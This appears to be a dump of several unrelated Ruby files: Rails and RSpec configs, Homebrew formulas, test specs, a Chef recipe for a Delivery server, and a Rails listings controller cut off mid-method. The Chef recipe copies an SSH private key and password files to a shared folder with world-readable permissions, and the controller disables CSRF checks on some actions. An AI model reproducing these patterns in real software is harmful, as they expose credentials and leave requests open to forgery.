:github # Sidekiq Web configuration config.scope_defaults :sidekiq, config: { client_id: Settings.sidekiq.github_oauth_key, client_secret: Settings.sidekiq.github_oauth_secret, scope: 'read:org', redirect_uri: 'sidekiq/auth/github/callback' } config.serialize_from_session { |key| Warden::GitHub::Verifier.load(key) } config.serialize_into_session { |user| Warden::GitHub::Verifier.dump(user) } end config.middleware.insert_after ActionDispatch::Cookies, ActionDispatch::Session::CookieStore, key: 'api_session', secure: Settings.session_cookie.secure, http_only: true # These files do not contain auto-loaded ruby classes, # they are loaded through app/workers/education_form/forms/base.rb Rails.autoloaders.main.ignore(Rails.root.join('app', 'workers', 'education_form', 'templates', '1990-disclosure')) end end
39.429907
118
0.676227
61898a8f950bd1c5681ea5c40f694e3d103fa3c0
739
RSpec.configure do |config| config.expect_with :rspec do |expectations| expectations.include_chain_clauses_in_custom_matcher_descriptions = true end config.mock_with :rspec do |mocks| mocks.verify_partial_doubles = true end # use :focus decorator on a test group to only run that group. config.filter_run :focus config.run_all_when_everything_filtered = true config.example_status_persistence_file_path = 'spec/examples.txt' # Put this file in .gitignore config.disable_monkey_patching! config.warnings = false if config.files_to_run.one? config.default_formatter = 'doc' end # Print 2 slowest test groups config.profile_examples = 2 config.order = :random Kernel.srand config.seed end
23.83871
97
0.7659
7a2011bef4fa10ef0ec3290528f64c007f58b442
2,190
class Ppsspp < Formula desc "PlayStation Portable emulator" homepage "https://ppsspp.org/" license all_of: ["GPL-2.0-or-later", "BSD-3-Clause"] head "https://github.com/hrydgard/ppsspp.git", branch: "master" # Remove stable block when patch is removed stable do url "https://github.com/hrydgard/ppsspp.git", tag: "v1.11.3", revision: "f7ace3b8ee33e97e156f3b07f416301e885472c5" # Fix build with latest FFmpeg. Remove in the next release. # See https://github.com/hrydgard/ppsspp/pull/14176 patch do url "https://github.com/hrydgard/ppsspp/commit/8a69c3d1226fe174c49437514a2d3ca7e411c3fa.patch?full_index=1" sha256 "1ae7265d299f26beffcff0f05c1567dcda6dd02d1ba1655892061530d5d6c008" end end bottle do rebuild 1 sha256 cellar: :any, arm64_big_sur: "e2fbd7a06918037ba8d7cd4cd63aac2a91da169109846858d289abf2c506dbea" sha256 cellar: :any, big_sur: "1fb64f1bf453622476e94460904d4f033e05f42755d3f6793775233e9a55dec9" sha256 cellar: :any, catalina: "9b375483a60f6e4e631c5c01a0f5b69c15ff69570749d31f0af77014a6e2c373" sha256 cellar: :any, mojave: "6d22974f4e46d094860b1b1de2ed5b1d9a77e41ae777519fe77e8172fc1ada54" sha256 cellar: :any_skip_relocation, x86_64_linux: "f6c3d227fe076c5bd40e7a9d3e5f389cfcc06a5659ced66478026efdb81aa645" end depends_on "cmake" => :build depends_on "pkg-config" => :build depends_on "ffmpeg" depends_on "glew" depends_on "libzip" depends_on "sdl2" depends_on "snappy" def install args = std_cmake_args # Use brewed FFmpeg rather than precompiled binaries in the repo args << "-DUSE_SYSTEM_FFMPEG=ON" # fix missing include for zipconf.h ENV.append_to_cflags "-I#{Formula["libzip"].opt_prefix}/lib/libzip/include" mkdir "build" do system "cmake", "..", *args system "make" if OS.mac? prefix.install "PPSSPPSDL.app" bin.write_exec_script "#{prefix}/PPSSPPSDL.app/Contents/MacOS/PPSSPPSDL" mv "#{bin}/PPSSPPSDL", "#{bin}/ppsspp" else bin.install "PPSSPPSDL" => "ppsspp" end end end end
37.118644
122
0.698174
01ad8eb63b806ffee1f3d15411e10c6547a9c3dd
539
class AttachmentPresenter < Presenter delegate :id, :contents, :created_at, :contents_are_image?, :note, to: :model def to_hash { :id => id, :name => contents.original_filename, :timestamp => created_at, :icon_url => contents_are_image? ? model.contents.url(:icon) : nil , :entity_type => "file", :type => File.extname(contents.original_filename).sub(/^\./, ''), note.type_name.underscore => present(note.primary_target) } end def complete_json? true end end
26.95
79
0.623377
e232352936471c60ee0d0ca1b4461934285341db
3,638
require 'helpers' describe StolenSleigh::Solution do describe "class methods" do describe "#new" do it "creates a new object" do expect( StolenSleigh::Solution.new ).to be_a StolenSleigh::Solution end end describe "with Marshal" do before do @orig_solution = StolenSleigh::Solution.new (0..100).each do |i| @orig_solution.items[0,i] = i @orig_solution.items[1,i] = i % 5 end @saved_data = Marshal.dump( @orig_solution ) @copy_solution = Marshal.load( @saved_data ) end it "can save and retrieve training data" do expect( @copy_solution ).to_not be @orig_solution expect( @copy_solution.items ).to be_an NArray orig_items = @orig_solution.items copy_items = @copy_solution.items expect( copy_items ).to_not be orig_items expect( copy_items ).to be_narray_like orig_items end end end describe "instance methods" do def make_valid_solution sol (0..99_999).each do |i| sol.items[0,i] = i sol.items[1,i] = i end end before :each do @solution = StolenSleigh::Solution.new (0..200).each do |i| @solution.items[0,i] = i + 7 @solution.items[1,i] = i % 20 end end describe "#clone" do it "makes deep copy of solution data" do @copy_solution = @solution.clone expect( @copy_solution ).to_not be @solution expect( @copy_solution.items ).to be_an NArray orig_items = @solution.items copy_items = @copy_solution.items expect( copy_items ).to_not be orig_items expect( copy_items ).to be_narray_like orig_items end end describe "#validate" do it "fails when not all gift_ids are set" do expect { @solution.validate }.to raise_error RuntimeError, /Not all gifts are in the solution/ end it "fails when a single gift_id is repeated" do make_valid_solution( @solution ) @solution.items[0,87654] = 12 expect { @solution.validate }.to raise_error RuntimeError, /Not all gifts are in the solution/ end it "fails when the weight is too high on a single trip" do make_valid_solution( @solution ) trip_id = 789 (789..900).each do |idx| @solution.items[1,idx] = trip_id end expect { @solution.validate }.to raise_error RuntimeError, /Non-valid trip found/ end it "passes for a basic solution of one trip per item" do make_valid_solution( @solution ) expect( @solution.validate ).to be true end it "passes for the sample solution" do @solution.import_csv( File.join(StolenSleigh::DATA_PATH, 'sample_submission.csv' ) ) expect( @solution.validate ).to be true end end describe "#generate_trip" do it "exports trip data for identified trip" do @solution.import_csv( File.join(StolenSleigh::DATA_PATH, 'sample_submission.csv' ) ) trip = @solution.generate_trip( 75 ) expect( trip.num_gifts ).to be 20 expect( trip.gifts ).to be_narray_like( NArray[ 75, 5075, 10075, 15075, 20075, 25075, 30075, 35075, 40075, 45075, 50075, 55075, 60075, 65075, 70075, 75075, 80075, 85075, 90075, 95075] ) end end describe "#score" do it "is correct for a basic solution of one trip per item" do make_valid_solution( @solution ) expect( @solution.score ).to be_within(0.1).of 29121011015.6 end end end end
31.362069
104
0.618197
3852009acabee0f68109677ea01fdf6006357e73
1,662
require "spec_helper" describe Bhm::Events::Base do it "can act as events factory" do alert = Bhm::Events::Base.create(:alert, alert_payload) expect(alert).to be_instance_of Bhm::Events::Alert expect(alert.kind).to eq(:alert) heartbeat = Bhm::Events::Base.create(:heartbeat, heartbeat_payload) expect(heartbeat).to be_instance_of Bhm::Events::Heartbeat expect(heartbeat.kind).to eq(:heartbeat) end it "whines on attempt to create event from unsupported types" do expect { Bhm::Events::Base.create!(:alert, "foo") }.to raise_error(Bhm::InvalidEvent, "Cannot create event from String") end it "whines on invalid events (when using create!)" do incomplete_payload = alert_payload(:severity => nil) alert = Bhm::Events::Base.create(:alert, incomplete_payload) expect(alert).not_to be_valid expect { Bhm::Events::Base.create!(:alert, incomplete_payload) }.to raise_error(Bhm::InvalidEvent, "severity is missing") end it "whines on unknown event kinds" do expect { Bhm::Events::Base.create!(:foobar, { }) }.to raise_error(Bhm::InvalidEvent, "Cannot find 'foobar' event handler") end it "normalizes attributes" do event = Bhm::Events::Base.new(:a => 1, :b => 2) expect(event.attributes).to eq({ "a" => 1, "b" => 2 }) end it "provides stubs for format representations" do event = Bhm::Events::Base.new [:validate, :to_plain_text, :to_hash, :to_json, :metrics].each do |method| expect { event.send(method) }.to raise_error(Bhm::FatalError, "'#{method}' is not implemented by Bosh::Monitor::Events::Base") end end end
30.777778
104
0.674489
912e391f79e5181093b82dbd6fe0a4c673d66716
779
FactoryBot.define do factory :content_item_request_data, class: Hash do content_id { SecureRandom.uuid } sequence(:base_path) { |n| "/test-content-#{n}" } title { "Test content" } description { "Test description" } document_type { "answer" } schema_name { "answer" } public_updated_at { Time.zone.now.iso8601 } publishing_app { "publisher" } rendering_app { "frontend" } locale { "en" } phase { "live" } details { { "body" => "<p>Something something</p>\n" } } routes do [{ "path" => base_path, "type" => "exact" }] end redirects { [] } update_type { "major" } skip_create trait :access_limited do access_limited { { "users" => %w[3fa46076-2dfd-4169-bcb0-141e2e4bc9b0] } } end end end
27.821429
80
0.608472
ace6ab962745773c404acc1b44c570da4f3baa0e
751
require File.expand_path('../../../../spec_helper', __FILE__) require File.expand_path('../../../../shared/file/owned', __FILE__) require File.expand_path('../fixtures/classes', __FILE__) describe "File::Stat#owned?" do it_behaves_like :file_owned, :owned?, FileStat end describe "File::Stat#owned?" do before(:each) do @file = tmp("i_exist") touch(@file) end after(:each) do rm_r @file end it "returns true if the file is owned by the user" do st = File.stat(@file) st.owned?.should == true end #platform_is_not :windows do # it "returns false if the file is not owned by the user" do # system_file = '/etc/passwd' # st = File.stat(system_file) # st.owned?.should == false # end #end end
23.46875
67
0.6498
e9458bd156399b8b2b01c64ac008684519a26f3c
4,277
# # Cookbook Name:: delivery_server # Recipe:: default # # Copyright (c) 2016 The Authors, All Rights Reserved. # include_recipe 'delivery_build::credentials' node['delivery_server']['packages'].each do |name, versioned_name| unless node['delivery_server']['use_package_manager'] remote_file "/var/tmp/#{versioned_name}" do source "#{node['delivery_server']['base_package_url']}/#{versioned_name}" end end package name do unless node['delivery_server']['use_package_manager'] source "/var/tmp/#{versioned_name}" end action :install end end # Loop # remote_file '/var/tmp/delivery-0.4.437-1.el7.x86_64.rpm' do # source 'file:///mnt/share/chef/delivery-0.4.437-1.el7.x86_64.rpm' # owner 'root' # group 'root' # end # # package 'delivery' do # source '/var/tmp/delivery-0.4.437-1.el7.x86_64.rpm' # action :install # end # Getting and installing a license file directory '/var/opt/delivery/license' do action :create end remote_file '/var/opt/delivery/license/delivery.license' do source "#{node['delivery_server']['base_package_url']}/delivery.license" owner 'root' group 'root' end directory '/etc/delivery' do owner 'root' group 'root' mode 00755 recursive true action :create end # Create a basic Delivery Configuration template '/etc/delivery/delivery.rb' do source 'delivery.rb.erb' owner 'root' group 'root' mode 00755 end remote_file '/etc/delivery/srv-delivery.pem' do # source 'http://myfile' source "#{node['delivery_server']['base_package_url']}/srv-delivery.pem" owner 'root' group 'root' mode 00755 # checksum 'abc123' end bash 'reconfigure delivery' do user 'root' cwd '/var/tmp' code <<-EOH delivery-ctl reconfigure EOH end # Creating the Delivery Enterprise/Org(s) bash 'generate Enterprise SSH credentials' do user 'root' cwd '/var/tmp' code <<-EOH cd /etc/delivery ssh-keygen -f #{node['delivery_server']['organisation']}_ssh_key EOH not_if { ::File.exist? "/etc/delivery/#{node['delivery_server']['organisation']}_ssh_key" } end # copy credentials somewhere safe, needs more work, # will be fine in testkitchen, but nowhere else remote_file "/mnt/share/chef/#{node['delivery_server']['organisation']}_ssh_key.pub" do # source 'http://myfile' source "file:///etc/delivery/#{node['delivery_server']['organisation']}_ssh_key.pub" owner 'root' group 'root' mode 00755 # checksum 'abc123' end remote_file "/mnt/share/chef/#{node['delivery_server']['organisation']}_ssh_key" do # source 'http://myfile' source "file:///etc/delivery/#{node['delivery_server']['organisation']}_ssh_key" owner 'root' group 'root' mode 00755 # checksum 'abc123' end # Copy the myorg key to builder_ssh. Need to fix this on docs and build node remote_file "/mnt/share/chef/builder_key" do # source 'http://myfile' source "file:///etc/delivery/#{node['delivery_server']['organisation']}_ssh_key" owner 'root' group 'root' mode 00755 # checksum 'abc123' end # Create the Enterprise bash 'create the delivery Enterprise' do user 'root' cwd '/tmp' code <<-EOH delivery-ctl create-enterprise #{node['delivery_server']['organisation']} --ssh-pub-key-file=/etc/delivery/#{node['delivery_server']['organisation']}_ssh_key.pub > /etc/delivery/passwords.txt EOH not_if "delivery-ctl list-enterprises |grep #{node['delivery_server']['organisation']}" end remote_file '/mnt/share/chef/passwords.txt' do source 'file:///etc/delivery/passwords.txt' owner 'root' group 'root' mode 00755 only_if { ::File.directory?("#{node['delivery_server']['kitchen_shared_folder']}") } # checksum 'abc123' end # Create the enterprise User, delivery bash 'create the delivery Enterprise user' do user 'root' cwd '/tmp' code <<-EOH delivery-ctl create-user #{node['delivery_server']['enterprise']} srv-delivery > /etc/delivery/deliverypassword.txt EOH #not_if "delivery-ctl list-enterprises |grep #{node['delivery_server']['organisation']}" end remote_file '/mnt/share/chef/deliverypassword.txt' do source 'file:///etc/delivery/deliverypassword.txt' owner 'root' group 'root' mode 00755 only_if { ::File.directory?("#{node['delivery_server']['kitchen_shared_folder']}") } # checksum 'abc123' end
26.079268
193
0.708674
f7dcf139c2c17de8940c091b80cf6ca017f478c0
4,737
require 'rails_helper' describe 'suggested searches', type: :feature do include StubbedRequests::Courses include StubbedRequests::Providers include StubbedRequests::Subjects let(:filter_page) { PageObjects::Page::ResultFilters::Location.new } let(:results_page) { PageObjects::Page::Results.new } let(:sort) { 'distance' } let(:base_parameters) { results_page_parameters('sort' => sort) } def suggested_search_count_parameters base_parameters.reject do |k, _v| ['page[page]', 'page[per_page]'].include?(k) end end before do stub_geocoder stub_subjects end def results_page_request(radius:, results_to_return:) query = base_parameters.merge( 'filter[latitude]' => 51.4980188, 'filter[longitude]' => -0.1300436, 'filter[radius]' => radius, 'filter[expand_university]' => false, ) stub_courses(query: query, course_count: results_to_return) end def across_england_results_page_request(results_to_return:) stub_courses(query: base_parameters, course_count: results_to_return) end def suggested_search_count_request(radius:, results_to_return:) query = suggested_search_count_parameters.merge( 'filter[latitude]' => 51.4980188, 'filter[longitude]' => -0.1300436, 'filter[radius]' => radius, 'filter[expand_university]' => false, ) stub_courses(query: query, course_count: results_to_return) end def suggested_search_count_across_england(results_to_return:) stub_courses(query: suggested_search_count_parameters, course_count: results_to_return) end context 'when an initial search returns no results' do context 'when the search was filtered to the default 50 mile radius' do before do results_page_request(radius: 50, results_to_return: 0) suggested_search_count_across_england(results_to_return: 10) across_england_results_page_request(results_to_return: 10) end it 'shows links for expanded across England search that would return more results' do filter_page.load filter_page.by_postcode_town_or_city.click filter_page.location_query.set 'SW1P 3BT' filter_page.find_courses.click expect(results_page.suggested_search_heading.text).to eq('Suggested searches') expect(results_page.suggested_search_description.text).to eq('You can find:') expect(results_page.suggested_search_links.first.text).to eq('10 courses across England') results_page.suggested_search_links.first.link.click expect(results_page.courses.count).to eq(10) end end context 'no courses are found in the suggested searches' do before do results_page_request(radius: 50, results_to_return: 0) suggested_search_count_across_england(results_to_return: 0) end it "doesn't show the link if there are no courses found" do filter_page.load filter_page.by_postcode_town_or_city.click filter_page.location_query.set 'SW1P 3BT' filter_page.find_courses.click expect(results_page).not_to have_suggested_search_links end end context 'there are no results in any suggested searches' do before do results_page_request(radius: 50, results_to_return: 0) suggested_search_count_across_england(results_to_return: 0) end it "doesn't show the suggested searches section" do filter_page.load filter_page.by_postcode_town_or_city.click filter_page.location_query.set 'SW1P 3BT' filter_page.find_courses.click expect(results_page).not_to have_suggested_searches end end end context 'a search with more than 3 results' do before do results_page_request(radius: 50, results_to_return: 10) end it 'shows no links' do filter_page.load filter_page.by_postcode_town_or_city.click filter_page.location_query.set 'SW1P 3BT' filter_page.find_courses.click expect(results_page).not_to have_suggested_search_links end end context 'a search filtered by provider with 2 results' do before do stub_providers( query: { 'fields[providers]' => 'provider_code,provider_name', 'search' => 'ACME', }, ) stub_courses( query: base_parameters.merge('filter[provider.provider_name]' => 'ACME SCITT 0'), course_count: 2, ) end it "doesn't show suggested searches" do filter_page.load filter_page.by_provider.click filter_page.provider_search.fill_in(with: 'ACME') filter_page.find_courses.click expect(results_page).not_to have_suggested_search_links end end end
31.58
97
0.710365
08bab594d6e31f42500f66b25843b6ba4bd956c3
2,841
# Copyright 2019 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. module Google module Type # An object representing a latitude/longitude pair. This is expressed as a pair # of doubles representing degrees latitude and degrees longitude. Unless # specified otherwise, this must conform to the # <a href="http://www.unoosa.org/pdf/icg/2012/template/WGS_84.pdf">WGS84 # standard</a>. Values must be within normalized ranges. # # Example of normalization code in Python: # # def NormalizeLongitude(longitude): # """Wraps decimal degrees longitude to [-180.0, 180.0].""" # q, r = divmod(longitude, 360.0) # if r > 180.0 or (r == 180.0 and q <= -1.0): # return r - 360.0 # return r # # def NormalizeLatLng(latitude, longitude): # """Wraps decimal degrees latitude and longitude to # [-90.0, 90.0] and [-180.0, 180.0], respectively.""" # r = latitude % 360.0 # if r <= 90.0: # return r, NormalizeLongitude(longitude) # elif r >= 270.0: # return r - 360, NormalizeLongitude(longitude) # else: # return 180 - r, NormalizeLongitude(longitude + 180.0) # # assert 180.0 == NormalizeLongitude(180.0) # assert -180.0 == NormalizeLongitude(-180.0) # assert -179.0 == NormalizeLongitude(181.0) # assert (0.0, 0.0) == NormalizeLatLng(360.0, 0.0) # assert (0.0, 0.0) == NormalizeLatLng(-360.0, 0.0) # assert (85.0, 180.0) == NormalizeLatLng(95.0, 0.0) # assert (-85.0, -170.0) == NormalizeLatLng(-95.0, 10.0) # assert (90.0, 10.0) == NormalizeLatLng(90.0, 10.0) # assert (-90.0, -10.0) == NormalizeLatLng(-90.0, -10.0) # assert (0.0, -170.0) == NormalizeLatLng(-180.0, 10.0) # assert (0.0, -170.0) == NormalizeLatLng(180.0, 10.0) # assert (-90.0, 10.0) == NormalizeLatLng(270.0, 10.0) # assert (90.0, 10.0) == NormalizeLatLng(-270.0, 10.0) # @!attribute [rw] latitude # @return [Float] # The latitude in degrees. It must be in the range [-90.0, +90.0]. # @!attribute [rw] longitude # @return [Float] # The longitude in degrees. It must be in the range [-180.0, +180.0]. class LatLng; end end end
43.707692
83
0.608589
8721bbd4938dcc16b4d42c060e857016702309b4
830
require 'spec_helper' include SpecInfra::Helper::SmartOS describe process("memcached") do let(:stdout) { " 1407\n" } its(:pid) { should eq 1407 } its(:command) { should eq "ps -C memcached -o pid= | head -1" } end describe process("memcached") do let(:stdout) { "/usr/bin/memcached -m 14386 -p 11211 -u nobody -l 10.11.1.53 -c 30000\n" } its(:args) { should match /-c 30000\b/ } its(:command) { should eq "ps -C memcached -o args= | head -1" } end describe process("memcached") do context "when running" do let(:stdout) { " 1407\n" } it { should be_running } its(:command) { should eq "ps -C memcached -o pid= | head -1" } end context "when not running" do let(:stdout) { " 1407\n" } it { should be_running } its(:command) { should eq "ps -C memcached -o pid= | head -1" } end end
27.666667
92
0.625301
1d3792b89a59792004e40d1471200a9218eb4b7a
207
class ChangedTeamsAddedSuspendedUntil < ActiveRecord::Migration def self.up add_column :teams, :suspended_until, :datetime end def self.down remove_column :teams, :suspended_until end end
20.7
63
0.758454
d5ba946072fab667a3a8c6f1d05f22c8b10056fb
1,166
class Rke < Formula desc "Rancher Kubernetes Engine, a Kubernetes installer that works everywhere" homepage "https://rancher.com/docs/rke/v0.1.x/en/" url "https://github.com/rancher/rke.git", :tag => "v0.1.11", :revision => "45d79aa3598a35196fbb4472e2e5eac86172cff5" bottle do cellar :any_skip_relocation sha256 "be1fced3aca5af994b7bdea1a4be26cf35dd3504faff7c6cb03ca6baa78ffd34" => :mojave sha256 "056f55ac6c5debf8a6bc9f40d0870a510609fd514fee5e57f682057cd270a1d5" => :high_sierra sha256 "069d35aa9bcdaebe8116a59e78c86a61291ae21c93d66d6003a24c11b9e309ca" => :sierra sha256 "4fedb9ebe7d7aeae26b450bfb3fb6213ab1aedc1caa272eb831e824dfbf097e5" => :x86_64_linux end depends_on "go" => :build def install ENV["GOPATH"] = buildpath (buildpath/"src/github.com/rancher/rke").install buildpath.children cd "src/github.com/rancher/rke" do system "go", "build", "-ldflags", "-w -X main.VERSION=v#{version}", "-o", bin/"rke" prefix.install_metafiles end end test do system bin/"rke", "config", "-e" assert_predicate testpath/"cluster.yml", :exist? end end
33.314286
94
0.709262
b9d50d76e46ff3b8d9801bcc98a1dae7c4485e68
16,254
class ListingsController < ApplicationController include PeopleHelper # Skip auth token check as current jQuery doesn't provide it automatically skip_before_filter :verify_authenticity_token, :only => [:close, :update, :follow, :unfollow] before_filter :only => [ :edit, :update, :close, :follow, :unfollow ] do |controller| controller.ensure_logged_in t("layouts.notifications.you_must_log_in_to_view_this_content") end before_filter :only => [ :new, :create ] do |controller| controller.ensure_logged_in t("layouts.notifications.you_must_log_in_to_create_new_listing", :sign_up_link => view_context.link_to(t("layouts.notifications.create_one_here"), sign_up_path)).html_safe end before_filter :person_belongs_to_current_community, :only => [:index] before_filter :save_current_path, :only => :show before_filter :ensure_authorized_to_view, :only => [ :show, :follow, :unfollow ] before_filter :only => [ :close ] do |controller| controller.ensure_current_user_is_listing_author t("layouts.notifications.only_listing_author_can_close_a_listing") end before_filter :only => [ :edit, :update ] do |controller| controller.ensure_current_user_is_listing_author t("layouts.notifications.only_listing_author_can_edit_a_listing") end before_filter :ensure_is_admin, :only => [ :move_to_top, :show_in_updates_email ] before_filter :is_authorized_to_post, :only => [ :new, :create ] skip_filter :dashboard_only def index if params[:format] == "atom" # API request for feed redirect_to :controller => "Api::ListingsController", :action => :index return end @selected_tribe_navi_tab = "home" if request.xhr? && params[:person_id] # AJAX request to load on person's listings for profile view # Returns the listings for one person formatted for profile page view per_page = params[:per_page] || 200 # the point is to show all here by default page = params[:page] || 1 render :partial => "listings/profile_listings", :locals => {:person => @person, :limit => per_page} return end redirect_to root end def checkout items = @current_user.current_cart.cart_items @cart_items = items end def invoice end def listing_bubble if params[:id] @listing = Listing.find(params[:id]) if @listing.visible_to?(@current_user, @current_community) render :partial => "homepage/listing_bubble", :locals => { :listing => @listing } else render :partial => "bubble_listing_not_visible" end end end # Used to show multiple listings in one bubble def listing_bubble_multiple @listings = Listing.visible_to(@current_user, @current_community, params[:ids]).order("id DESC") if @listings.size > 0 render :partial => "homepage/listing_bubble_multiple" else render :partial => "bubble_listing_not_visible" end end def show @selected_tribe_navi_tab = "home" unless current_user?(@listing.author) @listing.increment!(:times_viewed) end @current_image = if params[:image] @listing.image_by_id(params[:image]) else @listing.listing_images.first end @prev_image_id, @next_image_id = if @current_image @listing.prev_and_next_image_ids_by_id(@current_image.id) else [nil, nil] end form_path = if @listing.transaction_type.preauthorize_payment? # TODO This is copy-paste if @listing.transaction_type.price_per.present? book_path(:listing_id => @listing.id.to_s) else if @current_community.paypal_enabled? initiate_order_path(:listing_id => @listing.id.to_s) else preauthorize_payment_path(:listing_id => @listing.id.to_s) end end else if @listing.status_after_reply == "free" reply_to_listing_path(:listing_id => @listing.id.to_s) else post_pay_listing_path(:listing_id => @listing.id.to_s) end end payment_gateway = MarketplaceService::Community::Query.payment_type(@current_community.id) render locals: {form_path: form_path, payment_gateway: payment_gateway} end def new @seller_commission_in_use = @current_community.commission_from_seller && @current_community.payments_in_use? @selected_tribe_navi_tab = "new_listing" @listing = Listing.new if (@current_user.location != nil) temp = @current_user.location temp.location_type = "origin_loc" @listing.build_origin_loc(temp.attributes) else @listing.build_origin_loc(:location_type => "origin_loc") end if request.xhr? # AJAX request to get the actual form contents @listing.category = @current_community.categories.find(params[:subcategory].blank? ? params[:category] : params[:subcategory]) @custom_field_questions = @listing.category.custom_fields @numeric_field_ids = numeric_field_ids(@custom_field_questions) @listing.transaction_type = @current_community.transaction_types.find(params[:transaction_type]) logger.info "Category: #{@listing.category.inspect}" payment_type = MarketplaceService::Community::Query.payment_type(@current_community.id) payment_setup_missing, payment_setup_path = if payment_type == :braintree missing = PaymentRegistrationGuard.new(@current_community, @current_user, @listing).requires_registration_before_posting? [missing, payment_settings_path(@current_community.payment_gateway.gateway_type, @current_user)] elsif payment_type == :paypal missing = PaypalService::PaypalAccount::Query.personal_account(@current_user.id, @current_community.id).blank? [missing, new_paypal_account_settings_payment_path(@current_user.username)] else [false, nil] end if payment_setup_missing render :partial => "listings/payout_registration_before_posting", locals: {payment_settings_path: payment_setup_path } else render :partial => "listings/form/form_content", locals: {minimum_commission: minimum_commission} end else render locals: {minimum_commission: minimum_commission} end end def create if params[:listing][:origin_loc_attributes][:address].empty? || params[:listing][:origin_loc_attributes][:address].blank? params[:listing].delete("origin_loc_attributes") end params[:listing] = normalize_price_param(params[:listing]); @listing = Listing.new(params[:listing]) @listing.author = @current_user @listing.custom_field_values = create_field_values(params[:custom_fields]) if @listing.save listing_image_ids = params[:listing_images].collect { |h| h[:id] }.select { |id| id.present? } ListingImage.where(id: listing_image_ids, author_id: @current_user.id).update_all(listing_id: @listing.id) else redirect_to new_listing_path and return end if @listing.new_record? Rails.logger.error "Errors in creating listing: #{@listing.errors.full_messages.inspect}" flash[:error] = t("layouts.notifications.listing_could_not_be_saved", :contact_admin_link => view_context.link_to(t("layouts.notifications.contact_admin_link_text"), new_user_feedback_path, :class => "flash-error-link")).html_safe redirect_to new_listing_path else flash[:notice] = t("layouts.notifications.listing_created_successfully", :new_listing_link => view_context.link_to(t("layouts.notifications.create_new_listing"), new_listing_path)).html_safe Delayed::Job.enqueue(ListingCreatedJob.new(@listing.id, @current_community.id)) if @current_community.follow_in_use? Delayed::Job.enqueue(NotifyFollowersJob.new(@listing.id, @current_community.id), :run_at => NotifyFollowersJob::DELAY.from_now) end redirect_to @listing, status: 303 end end def edit @seller_commission_in_use = @current_community.commission_from_seller && @current_community.payments_in_use? @selected_tribe_navi_tab = "home" if [email protected]_loc @listing.build_origin_loc(:location_type => "origin_loc") end @custom_field_questions = @listing.category.custom_fields.find_all_by_community_id(@current_community.id) @numeric_field_ids = numeric_field_ids(@custom_field_questions) render locals: {minimum_commission: minimum_commission} end def update if (params[:listing][:origin] && (params[:listing][:origin_loc_attributes][:address].empty? || params[:listing][:origin].blank?)) params[:listing].delete("origin_loc_attributes") if @listing.origin_loc @listing.origin_loc.delete end end @listing.custom_field_values = create_field_values(params[:custom_fields]) params[:listing] = normalize_price_param(params[:listing]); if @listing.update_fields(params[:listing]) @listing.location.update_attributes(params[:location]) if @listing.location flash[:notice] = t("layouts.notifications.listing_updated_successfully") Delayed::Job.enqueue(ListingUpdatedJob.new(@listing.id, @current_community.id)) redirect_to @listing else Rails.logger.error "Errors in editing listing: #{@listing.errors.full_messages.inspect}" flash[:error] = t("layouts.notifications.listing_could_not_be_saved", :contact_admin_link => view_context.link_to(t("layouts.notifications.contact_admin_link_text"), new_user_feedback_path, :class => "flash-error-link")).html_safe redirect_to edit_listing_path(@listing) end end def close payment_gateway = MarketplaceService::Community::Query.payment_type(@current_community.id) @listing.update_attribute(:open, false) respond_to do |format| format.html { redirect_to @listing } format.js { render :layout => false, locals: {payment_gateway: payment_gateway} } end end def move_to_top @listing = @current_community.listings.find(params[:id]) # Listings are sorted by `sort_date`, so change it to now. if @listing.update_attribute(:sort_date, Time.now) redirect_to homepage_index_path else flash[:warning] = "An error occured while trying to move the listing to the top of the homepage" Rails.logger.error "An error occured while trying to move the listing (id=#{Maybe(@listing).id.or_else('No id available')}) to the top of the homepage" redirect_to @listing end end def show_in_updates_email @listing = @current_community.listings.find(params[:id]) # Listings are sorted by `created_at`, so change it to now. if @listing.update_attribute(:updates_email_at, Time.now) render :nothing => true, :status => 200 else Rails.logger.error "An error occured while trying to move the listing (id=#{Maybe(@listing).id.or_else('No id available')}) to the top of the homepage" render :nothing => true, :status => 500 end end #shows a random listing from current community def random open_listings_ids = Listing.currently_open.select("id").find_with(nil, @current_user, @current_community).all if open_listings_ids.empty? redirect_to root and return #render :action => :index and return end random_id = open_listings_ids[Kernel.rand(open_listings_ids.length)].id #redirect_to listing_path(random_id) @listing = Listing.find_by_id(random_id) render :action => :show end def ensure_current_user_is_listing_author(error_message) @listing = Listing.find(params[:id]) return if current_user?(@listing.author) || @current_user.has_admin_rights_in?(@current_community) flash[:error] = error_message redirect_to @listing and return end def follow change_follow_status("follow") end def unfollow change_follow_status("unfollow") end def verification_required end private def minimum_commission payment_type = MarketplaceService::Community::Query.payment_type(@current_community.id) currency = @current_community.default_currency case payment_type when :paypal paypal_minimum_commissions_api.get(currency) else Money.new(0, currency) end end def paypal_minimum_commissions_api PaypalService::API::Api.minimum_commissions_api end # Ensure that only users with appropriate visibility settings can view the listing def ensure_authorized_to_view @listing = Listing.find(params[:id]) unless @listing.visible_to?(@current_user, @current_community) || (@current_user && @current_user.has_admin_rights_in?(@current_community)) if @listing.public? # This situation occurs when the user tries to access a listing # via a different community url. flash[:error] = t("layouts.notifications.this_content_is_not_available_in_this_community") redirect_to root and return elsif @current_user flash[:error] = t("layouts.notifications.you_are_not_authorized_to_view_this_content") redirect_to root and return else session[:return_to] = request.fullpath flash[:warning] = t("layouts.notifications.you_must_log_in_to_view_this_content") redirect_to login_path and return end end end def change_follow_status(status) status.eql?("follow") ? @current_user.follow(@listing) : @current_user.unfollow(@listing) respond_to do |format| format.html { redirect_to @listing } format.js { render :follow, :layout => false } end end def custom_field_value_factory(custom_field_id, answer_value) question = CustomField.find(custom_field_id) answer = question.with_type do |question_type| case question_type when :dropdown option_id = answer_value.to_i answer = DropdownFieldValue.new answer.custom_field_option_selections = [CustomFieldOptionSelection.new(:custom_field_value => answer, :custom_field_option_id => answer_value)] answer when :text answer = TextFieldValue.new answer.text_value = answer_value answer when :numeric answer = NumericFieldValue.new answer.numeric_value = ParamsService.parse_float(answer_value) answer when :checkbox answer = CheckboxFieldValue.new answer.custom_field_option_selections = answer_value.map { |value| CustomFieldOptionSelection.new(:custom_field_value => answer, :custom_field_option_id => value) } answer when :date_field answer = DateFieldValue.new answer.date_value = DateTime.new(answer_value["(1i)"].to_i, 